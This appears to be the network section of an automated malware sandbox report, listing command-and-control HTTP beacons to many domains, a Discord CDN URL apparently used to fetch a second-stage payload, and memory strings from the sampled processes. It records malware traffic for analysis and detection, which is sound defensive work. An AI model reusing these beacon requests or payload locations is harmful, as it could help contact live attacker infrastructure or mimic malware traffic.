Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.rodgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=tVqqbIXu9nslI248AUXCUxr0o0zC9i0c8STc7UOUyN+2mFy87kkATVtNwFSSPJTjqgHk&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.buttsliders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=kTde6z/9FBgibCJh75hFV8EYWatL1OQ/rhfr5oU2UZBR6XWcBOIn723UV5Uezh3ZQ4ot&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.thanksforlove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=b8EUNPE+oYf5M4MWpXscm/Bt3xsjLt8hNenJJ3DjxXNjYfRDWC0pztruTX9IDl5bQG1I&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.outtheframecustoms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=wzqvVRf3v7wWdKVsEzaCYluZDwjvGR+wpj+mt/yOJMnJEVZY6i5f9AVoqOYOhCkuGFts&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.theyolokart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.higherthan75.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.renabbeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.ahomedokita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.pocketspacer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=8pT0OCjpukmgT2/VEONoh7Jhw41r4itI2gwuQkgKFiQj+4gEMjoX0rzJNNSQA5Q1OcRE&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.cia3mega.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=E4R/8wd6fgEkWdVXGUezTNl/uDJNCiSgqhAFvmJDlfqfpwFCHVrHgZ/vPMmlVzFxpgLt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=DaVCjFuxi8IQ0KSmZmVVzdfbFs8HKa1S3sC5D9GQ7HSGSXmO4QACkgMj7QCmBzxlGckN&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.makingdoathome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.rodgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=tVqqbIXu9nslI248AUXCUxr0o0zC9i0c8STc7UOUyN+2mFy87kkATVtNwFSSPJTjqgHk&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.buttsliders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=kTde6z/9FBgibCJh75hFV8EYWatL1OQ/rhfr5oU2UZBR6XWcBOIn723UV5Uezh3ZQ4ot&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.thanksforlove.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=b8EUNPE+oYf5M4MWpXscm/Bt3xsjLt8hNenJJ3DjxXNjYfRDWC0pztruTX9IDl5bQG1I&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.outtheframecustoms.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=wzqvVRf3v7wWdKVsEzaCYluZDwjvGR+wpj+mt/yOJMnJEVZY6i5f9AVoqOYOhCkuGFts&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.theyolokart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=WRaEwe7grAm8RcFyQBNRvy9NVNi7wOvDLX3hizJdol6io43A3OIdw5NSblbyY8qTqmIe&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.higherthan75.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=73SmHps+05HxyxR+Sls8P85g8AMVj2xb8ZN5KGQQxUczRwjFANvvf8FlZWdGNK7+ujWZ&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.renabbeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=5YbgiWOMvK10e+D+Ti4oKvmTwuSwaKBdeKNLrkVAsRRvF5LwbTMOesGYedm1bG3cJWIa&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.ahomedokita.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=W7vyYWXucRnMwWrTc6z6xJ7ly1Aaea5WWr62fhSAhoSHJNEqGWpe7zCBU0dcNM6Zeho8&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.dainikamarsomoy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=AqHI0+MX2ftrVe3DEiYBNVYhM67Z+qKer8sV+OvuybcJEoEJXTUx/oN346XCugNKhu9g&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.kingdomwinecommunity.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=rm4JCycf8jgnKzL2gaZxJFxF+HyMTTLQtqzA4xmgqdXyWq3yu1ARpOH0ZAK4rmQWxcAt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.pocketspacer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=8pT0OCjpukmgT2/VEONoh7Jhw41r4itI2gwuQkgKFiQj+4gEMjoX0rzJNNSQA5Q1OcRE&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.cia3mega.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=E4R/8wd6fgEkWdVXGUezTNl/uDJNCiSgqhAFvmJDlfqfpwFCHVrHgZ/vPMmlVzFxpgLt&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.sportsbookmatcher.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=DaVCjFuxi8IQ0KSmZmVVzdfbFs8HKa1S3sC5D9GQ7HSGSXmO4QACkgMj7QCmBzxlGckN&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.makingdoathome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /9t6k/?URflh=+VDOv2YqGr3HQyUjxvr4ySDa222PNTvrG/MhsshnzvB0EZlKybOlzjmZT3Iubthnocji&UfrDal=0nMpqJVP5t_PDD5p HTTP/1.1Host: www.rodgroup.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: discord.com

Source: unknown

Source: global traffic

Source: AT113020.exe, 00000001.00000003.237565078.00000000007D6000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.co
Source: Accfdrv.exe, 0000000C.00000002.287804141.000000000090B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000002.287804141.000000000090B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: AT113020.exe, 00000001.00000003.237565078.00000000007D6000.00000004.00000001.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOECCCertificationAuthority.crl0r
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crl0
Source: Accfdrv.exe, 00000005.00000003.272990264.0000000000897000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca7
Source: Accfdrv.exe, 0000000C.00000002.287804141.000000000090B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca_nu
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp	String found in binary or memory: http://crt.comodoca4.com/COMODOECCDomainValidationSecureServerCA2.crt0%
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.eot
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.otf
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.woff
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/27586/searchbtn.png)
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/27587/BG_2.png)
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/27587/Left.png)
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/27587/Right.png)
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000002.287804141.000000000090B000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca4.com0
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.Rodgroup.net
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp141
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp1M
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpD?
Source: msdt.exe, 00000008.00000002.1016593743.00000000006C8000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: msdt.exe, 00000008.00000002.1016593743.00000000006C8000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp&P
Source: msdt.exe, 00000008.00000002.1016593743.00000000006C8000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/de-ch/ocid=iehpTP(_t
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp	String found in binary or memory: http://www.msn.com/ocid=iehp
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/9t6k/?URflh=
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/All_Inclusive_Vacation_Packages.cfm?fp=5zm8GCCUOjG%2F%2BtWNbnIaevq%2F7pyqIew
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/Credit_Card_Application.cfm?fp=5zm8GCCUOjG%2F%2BtWNbnIaevq%2F7pyqIewWINVaXbd
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/Free_Credit_Report.cfm?fp=5zm8GCCUOjG%2F%2BtWNbnIaevq%2F7pyqIewWINVaXbdLPLIN
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/Online_classifieds.cfm?fp=5zm8GCCUOjG%2F%2BtWNbnIaevq%2F7pyqIewWINVaXbdLPLIN
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/__media__/design/underconstructionnotice.php?d=rodgroup.net
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/__media__/js/trademark.php?d=rodgroup.net&type=ns
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/display.cfm
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/fashion_trends.cfm?fp=5zm8GCCUOjG%2F%2BtWNbnIaevq%2F7pyqIewWINVaXbdLPLIN2DV6
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/px.js?ch=1
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/px.js?ch=2
Source: msdt.exe, 00000008.00000002.1022071280.0000000004ECD000.00000004.00000001.sdmp	String found in binary or memory: http://www.rodgroup.net/sk-logabpstatus.php?a=azNKanZNU0UxaU9PS2oreG5lOFBSSDFoK05hNy95bzJITFdxcjJUSm
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.258961940.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
Source: Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/?
Source: Accfdrv.exe, 00000005.00000003.272515659.0000000000851000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/K
Source: Accfdrv.exe, 0000000C.00000002.287726771.00000000008C1000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/R
Source: Accfdrv.exe, 0000000C.00000002.287726771.00000000008C1000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/777569443156197399/782882049986920478/Accfcxz
Source: AT113020.exe, 00000001.00000003.237560785.00000000007CF000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/777569443156197399/782882049986920478/Accfcxz&
Source: Accfdrv.exe, 00000005.00000003.272515659.0000000000851000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/c
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp	String found in binary or memory: https://cdn.discordapp.com/o
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1R
Source: AT113020.exe, Accfdrv.exe, Accfdrv.exe, 0000000C.00000002.290227188.0000000004240000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/
Source: AT113020.exe, 00000001.00000002.242538042.00000000040E0000.00000004.00000001.sdmp, Accfdrv.exe, 00000005.00000002.276299189.0000000004073000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000002.290227188.0000000004240000.00000004.00000001.sdmp	String found in binary or memory: https://discord.com/S
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://login.live.com/login.srfwa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wrep
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: msdt.exe, 00000008.00000002.1016860438.0000000000767000.00000004.00000020.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorizeclient_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e3
Source: Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000002.287804141.000000000090B000.00000004.00000001.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: AT113020.exe, 00000001.00000002.238179914.0000000000782000.00000004.00000020.sdmp, Accfdrv.exe, 00000005.00000003.272714331.0000000000882000.00000004.00000001.sdmp, Accfdrv.exe, 0000000C.00000003.286858958.00000000008FB000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/
Source: msdt.exe, 00000008.00000002.1016843957.0000000000763000.00000004.00000020.sdmp	String found in binary or memory: https://www.google.com/chrome/R?
